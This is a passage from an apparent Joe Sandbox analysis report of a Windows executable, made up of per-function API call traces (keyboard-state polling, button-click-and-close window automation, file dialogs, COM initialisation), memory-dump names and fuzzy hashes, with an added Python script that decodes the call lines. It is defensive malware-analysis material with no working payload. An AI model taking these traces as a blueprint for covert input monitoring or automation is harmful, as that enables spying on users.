                                                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
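The call lines in these blocks all follow one pattern, `Name.MODULE(args), ref: address`, with window messages and flags printed as raw hex, so the routine at 004300C3 reads as a list of handles until the constants are decoded (GENERIC_READ/OPEN_EXISTING, GMEM_MOVEABLE for CreateStreamOnHGlobal, LR_CREATEDIBSECTION, then STM_SETIMAGE: a file loaded through OleLoadPicture and handed to a static control). The decoder below is an added example written for this page; it is not Joe Sandbox code and not part of the report. It parses that line pattern, annotates only constants whose values are certain, and splits the `.sdmp` names into fields. The positional meaning of those fields (fourth = region base, fifth = page protection, seventh = region type) is my reading of the names on this page, not something the report documents, and the sample lines are copied from the blocks above.

```python
"""Decode Joe Sandbox 'APIs' call lines and .sdmp dump names (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Matches lines such as:
#   • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
#   • GetParent.USER32 ref: 00445BF8
#   • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Window messages seen in this report. WM_USER- and LVM_FIRST-relative values
# only mean something once the target control class is known, so say so.
WINDOW_MESSAGES = {
    0x0010: "WM_CLOSE",
    0x00C2: "EM_REPLACESEL",
    0x00F5: "BM_CLICK",
    0x0111: "WM_COMMAND",
    0x0172: "STM_SETIMAGE",
    0x0402: "WM_USER+2 (PBM_SETPOS if the target is a progress bar)",
    0x1002: "LVM_FIRST+2 (LVM_GETIMAGELIST if the target is a list view)",
}
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int
    notes: list[str] = field(default_factory=list)


def _hex(arg: str) -> int | None:
    """Hex argument to int; '?' and string literals (unresolved) give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def annotate(call: ApiCall) -> list[str]:
    """Name the constants in the call's arguments where the value is certain."""
    a, notes = call.args, []
    if call.api == "SendMessageW" and len(a) >= 2 and (msg := _hex(a[1])) is not None:
        notes.append(WINDOW_MESSAGES.get(msg, f"message 0x{msg:04X}"))
    elif call.api == "CreateFileW" and len(a) >= 5:
        access, disposition = _hex(a[1]), _hex(a[4])
        if access is not None:
            notes.append("GENERIC_READ" if access == 0x80000000 else f"access 0x{access:08X}")
        if disposition == 3:
            notes.append("OPEN_EXISTING")
    elif call.api == "GlobalAlloc" and a and (flags := _hex(a[0])) is not None:
        notes.append("GMEM_MOVEABLE" if flags & 0x2 else "GMEM_FIXED")
    elif call.api == "CopyImage" and len(a) >= 5 and (flags := _hex(a[4])) is not None:
        if flags & 0x2000:
            notes.append("LR_CREATEDIBSECTION")
    elif call.api == "mciSendStringW" and a:
        notes.append(f"MCI command: {a[0]}")
    return notes


def parse_api_line(line: str) -> ApiCall | None:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [x.strip() for x in raw.split(",")] if raw else []
    call = ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))
    call.notes = annotate(call)
    return call


def decode_block(lines: list[str]) -> list[str]:
    """One annotated line per recognised API call; non-call lines are skipped."""
    out = []
    for call in filter(None, map(parse_api_line, lines)):
        desc = f"{call.ref:08X} {call.api}.{call.module}"
        out.append(desc + (": " + ", ".join(call.notes) if call.notes else ""))
    return out


def parse_dump_name(name: str) -> dict:
    """Split a .sdmp name; field positions are an assumption (see lead-in)."""
    f = (name[:-5] if name.endswith(".sdmp") else name).split(".")
    if len(f) != 8:
        raise ValueError(f"unexpected .sdmp name layout: {name}")
    return {
        "base": int(f[3], 16),
        "protect": PAGE_PROTECT.get(int(f[4], 16), f[4]),
        "type": MEM_TYPE.get(int(f[6], 16), f[6]),
    }


# Constructed input: lines copied from the function blocks in this report.
SAMPLE_LINES = [
    "• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3",
    "• GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9",
    "• CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8",
    "• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7",
    "• GetParent.USER32 ref: 00445BF8",
    "  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D",
    "• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC",
    "• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22",
]

if __name__ == "__main__":
    print("\n".join(decode_block(SAMPLE_LINES)))
    print(parse_dump_name("00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp"))
```

Run over the blocks above, the decoder turns the 0x401000 dump into `PAGE_EXECUTE_READ` / `MEM_IMAGE`, which is consistent with the "based on PE: true" note on each Source File line, and exposes the BM_CLICK followed by WM_CLOSE at 00443BFC/00443C22 as a click-a-button-then-close-the-window routine. Messages above WM_USER are left qualified on purpose: 0x402 and 0x1002 mean different things to different control classes, and guessing the class from a call trace is how false conclusions get into a report.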
                                                APIs
                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                • _wcscpy.LIBCMT ref: 004787E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 3052893215-2127371420
                                                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                APIs
                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                • __swprintf.LIBCMT ref: 0045E7F7
                                                • _wprintf.LIBCMT ref: 0045E8B3
                                                • _wprintf.LIBCMT ref: 0045E8D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 2295938435-2354261254
                                                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 3038501623-2263619337
                                                • Opcode ID: 0ed174719ccce37c49a7b10a239214af4415cbf245d9ef728fb1cecd9ea5956d
                                                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                • Opcode Fuzzy Hash: 0ed174719ccce37c49a7b10a239214af4415cbf245d9ef728fb1cecd9ea5956d
                                                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                APIs
                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                • __swprintf.LIBCMT ref: 0045E5F6
                                                • _wprintf.LIBCMT ref: 0045E6A3
                                                • _wprintf.LIBCMT ref: 0045E6C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 2295938435-8599901
                                                • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                APIs
                                                • timeGetTime.WINMM ref: 00443B67
                                                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                • SetActiveWindow.USER32(?), ref: 00443BEC
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                • IsWindow.USER32(?), ref: 00443C3A
                                                • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                Similarity
                                                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                • String ID: BUTTON
                                                • API String ID: 1834419854-3405671355
                                                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                • LoadStringW.USER32(00000000), ref: 00454040
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • _wprintf.LIBCMT ref: 00454074
                                                • __swprintf.LIBCMT ref: 004540A3
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                • API String ID: 455036304-4153970271
                                                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                APIs
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                • _memmove.LIBCMT ref: 00467EB8
                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                • _memmove.LIBCMT ref: 00467F6C
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                Similarity
                                                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                • String ID:
                                                • API String ID: 2170234536-0
                                                • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 00453CE0
                                                • SetKeyboardState.USER32(?), ref: 00453D3B
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                • GetKeyState.USER32(000000A0), ref: 00453D75
                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                • GetKeyState.USER32(00000011), ref: 00453DEF
                                                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                • GetKeyState.USER32(00000012), ref: 00453E26
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                APIs
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                • DeleteObject.GDI32(?), ref: 0047151E
                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                • DeleteObject.GDI32(?), ref: 004715EA
                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                Similarity
                                                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                • String ID:
                                                • API String ID: 3218148540-0
                                                • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                Similarity
                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                • String ID:
                                                • API String ID: 136442275-0
                                                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                APIs
                                                • _wcsncpy.LIBCMT ref: 00467490
                                                • _wcsncpy.LIBCMT ref: 004674BC
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • _wcstok.LIBCMT ref: 004674FF
                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                • _wcstok.LIBCMT ref: 004675B2
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                • _wcslen.LIBCMT ref: 00467793
                                                • _wcscpy.LIBCMT ref: 00467641
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcslen.LIBCMT ref: 004677BD
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                Similarity
                                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                • String ID: X
                                                • API String ID: 3104067586-3081909835
                                                • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                • _wcslen.LIBCMT ref: 0046CDB0
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                Strings
                                                • NULL Pointer assignment, xrefs: 0046CEA6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 440038798-2785691316
                                                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                • _wcslen.LIBCMT ref: 004610A3
                                                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                • GetWindowRect.USER32(?,?), ref: 00461248
                                                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                Similarity
                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                • String ID: ThumbnailClass
                                                • API String ID: 4136854206-1241985126
                                                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                • GetClientRect.USER32(?,?), ref: 00471A1A
                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                Similarity
                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                • String ID: 2
                                                • API String ID: 1331449709-450215437
                                                • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
